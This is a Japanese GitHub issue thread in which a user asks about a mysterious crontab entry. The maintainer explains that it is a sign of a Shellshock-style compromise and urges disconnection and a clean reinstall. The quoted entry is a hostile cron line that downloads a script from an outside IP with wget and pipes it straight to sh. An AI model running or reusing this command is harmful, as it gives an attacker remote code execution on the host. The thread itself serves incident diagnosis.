### ISSUE TITLE
crontabについて

### ISSUE THREAD

**Issue by routeone34** [kanreisa/Chinachu#137]
Chinachuを運用しているとcrontabに以下のような行が追加されますが、
これは何をしているのでしょうか。

===================================================================
24 * * * * (wget http://85.21.143.238/cmd/X.X.X.X/t.sh -qO-|sh -)>/dev/null 2>&1
※先頭の「24」はランダム。X.X.X.XはうちのグローバルIP
===================================================================

現在t.shを見に行くと「# ECHO 1」となっていて何も起きないようですが、
t.shの内容次第で何でも（chinachu用OSユーザーの権限内で）実行できてしまう
ような気がしてちょっと不安です。

[Q1] このcron設定は何のためのものですか
[Q2] 設定でオフにできますか
[Q3] ファイアウォール等で通信を止めた場合何問題がありますか

よろしくお願いします。

**Comment by kanreisa** [comment]
それ、Shellshock脆弱性等によって何者かによって改竄されているものです。
直ちにインターネットから切断してファイルを修復するなりシステムのクリーンインストールを行うことをオススメします。

ちなみにChinachuは関係ありません。

https://r2.ag/shellshock/
http://blog.trendmicro.co.jp/archives/10072

**Comment by routeone34** [comment]
情報ありがとうございました。直ちに対処します。
Chinachuの問題であるかのように扱ってしまい、誠に申し訳ありません。

**Comment by kanreisa** [comment]
またなにかありましたらご報告ください :)
